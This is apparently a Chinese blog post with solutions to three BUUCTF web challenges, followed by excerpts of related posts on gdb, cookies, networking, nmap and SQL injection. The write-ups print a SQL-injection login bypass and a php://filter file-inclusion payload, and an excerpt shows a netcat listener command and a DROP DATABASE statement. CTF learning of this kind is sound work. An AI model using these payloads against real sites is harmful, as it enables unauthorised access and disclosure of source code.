buuctf-web-wp

发表于2025-07-14|更新于2025-07-20|ctfweb

|浏览量:

[极客大挑战2019]EasySQL

1 2	admin' or 1=1# 123456

‘#’是注释符，相当于

1	SELECT * FROM users WHERE username='admin' or 1=1 --' AND password='123'

[极客大挑战2019]Havefun1

查看网页源代码，有注释

        <!--
$cat=$_GET['cat']; // 从URL的GET参数中获取名为'cat'的值
echo $cat;          // 输出这个值
if($cat=='dog'){    // 如果获取到的值等于字符串'dog'
    echo 'Syc{cat_cat_cat_cat}';    // 就输出这个看起来像flag的字符串
}
-->

在url中添加get参数为cat=dog

[ACTF2020新生赛]Include

点进tips

1	http://13ef86de-b0df-479d-81ed-82f13b3a7db8.node5.buuoj.cn:81/?file=flag.php

根据file=flag.php可知，可能考察文件包含
使用php伪协议读取源码(php://filter)

1	php://filter/convert.base64-encode/resource=目标文件

即

1	http://13ef86de-b0df-479d-81ed-82f13b3a7db8.node5.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=flag.php

得到：PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YmQzZGM3YjEtNTNjNC00NTY1LTg2MDItOGZhOTUwOGUyOGY1fQo=
进行base64解码

Base64仅包含 A-Z、a-z、0-9、+、/ 和填充符 =
得到flag0

文章作者: QingMaxLim

文章链接: http://example.com/2025/07/14/buuctf-web-wp/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 QingMaxLim-Blog！

相关推荐

关于写计组作业的一点总结 1.启动1gdb test1 2.一些基本命令123456789101112b main # 断点info b # 查看断点delete # 删除断点run ans.txt # 运行next # n 单步执行(不进入函数)stepi # s 单步执行(进入函数)p # 打印backtrace # 查看调用栈c # continue 继续运行finish # 结束当前函数，返回函数调用点kill # 杀死当前的调试进程disas function # 反汇编function函数 3.其他命令1layout asm

Cookie,Session,Token

http无状态协议 cookie 服务端产生内容，发送浏览器保存本地，cookie可以被来回传递，主要用于记录用户的会话状态、身份验证、跟踪用户的行为优点：在浏览器和服务器间来回传递，适用于跟踪用户行为可以手动设置过期时间，灵活调节存储时间缺点：每次请求都携带cookie数据，增加流量浪费性能在http中明文传输不够安全，容易被篡改存储容量小，一般为4KB 应用场景：在客户端和服务器之间共享数据 + 长期存储 session(会话) 开始：浏览器访问服务器结束：比较模糊不同网站对与用户的会话都设定了时间(结束会话)以及唯一的ID(session ID) 一般保存在数据库中服务器把session ID和会话结束时间发送给浏览器(cookie) localStorage(类似sessionStorage) html5引入，web API 允许在浏览器中长期存储键值对数据，不随http请求发送到服务器优点：存储容量较大，一般为5M 存储的数据在客户端浏览器可以永久保存，不担心丢失操作方便，API友好，能通过JS直接访问缺点：一网站只...

挖个坑先，欸嘿～计算机网络简述计算机网络概述分组交换通过标有地址的分组进行路由选择传送数据，使通信通道仅在传送期间被占用的一种交换方式分组的组成每个分组都由首部和数据段组成交换方式存储转发节点收到分组，先暂时存储下来，在检查首部，按首部中的目的地址，找到合适的节点转发出去特点： 1.以分组作为传输单位 2.独立选择转发路由 3.逐段占用，动态分配传输带宽多级结构Internet TCP/IP协议 (计算机网络的世界语)分层结构为了使各种不同计算机之间可以互联。ARPANet指定了一套计算机通信协议，即TCP/IP协议(族) 为了减少协议设计的复杂性，大多数网络模型均采用分层的方式来组织 1.每一层利用下一层提供的服务来为上一层提供服务 2.本层服务的实现细节对上层屏蔽 TCP/IP协议的四层应用层：应用程序间沟通的层 FTP(文件传输),Telnet(远程),HTTP(超文本)等传输层：提供进程间的数据传送服务，负责传送数据，提供应用程序端到端的逻辑通信 TCP,UDP 网络层：提供基本的数据封包传送功能，最大可...

nmap(扫描工具)使用

1.Nmap介绍1.是一款开源免费的网络探测、安全审计的工具2.通过Nmap探测服务器存活以及开放的服务，以及对目标进行安全审计3.功能：主机发现、端口扫描、版本侦测、操作系统侦测4.主要用于内网，专门扫描端口开放情况5.namp扫描ip：只有能连接到的ip,可以扫描同网段ip 2.一些常用参数 -T4指定扫描过程的级别，级别越高扫描速度越快，但也越容易被防火墙或者IDS屏蔽，一般推荐使用T4级别 -sn只进行主机发现，不进行端口扫描 -O 进行系统版本扫描 –osscan-guess 当无法精确匹配时，强制显示最接近的操作系统猜测结果 -sV进行服务版本扫描 -p 扫描指定端口 -sS发送SYN包扫描 -sT 发送TCP包扫描 -sA 发送ACK包扫描 -sU UDP扫描 -PO 不进行ping扫描 -script 指定脚本扫描 -Pn(跳过主机存活检测),不进行ping检测 -p- 扫描所有65535端口(而非常规的1000个) 3.一些实例1.扫描本机12namp 192.168.xxx.xxxnc -lvp 8888 # 打开端口 1234567891011# 探测...

SQL注入攻击

概述在服务器向数据库进行数据查询时，不输入正常的数据，输入代码，使数据查询变成代码执行 sql语言(部分)：选取表格中所有内容 1select * from allusers 选取指定的用户名和密码 1where username = 'QingMaxLim' And passwd = 'passwd' where关键字 SQL语句遇到where关键词时，会判断条件是真是假某个神奇的指令 1DROP DATABASE TABLICE --删除整个数据库 5.SQL合并两个表格的内容： 1select * from table1 Union select * from table2 报错与注释多’ 1where username = 'QingMaxLim'' And passwd = 'passwd' 执行时将’’中的视为字符数据，而不是操作符，此条语句报错，服务器可能将SQL报错信息直接返回给用户2. ‘后有– 1where username = '...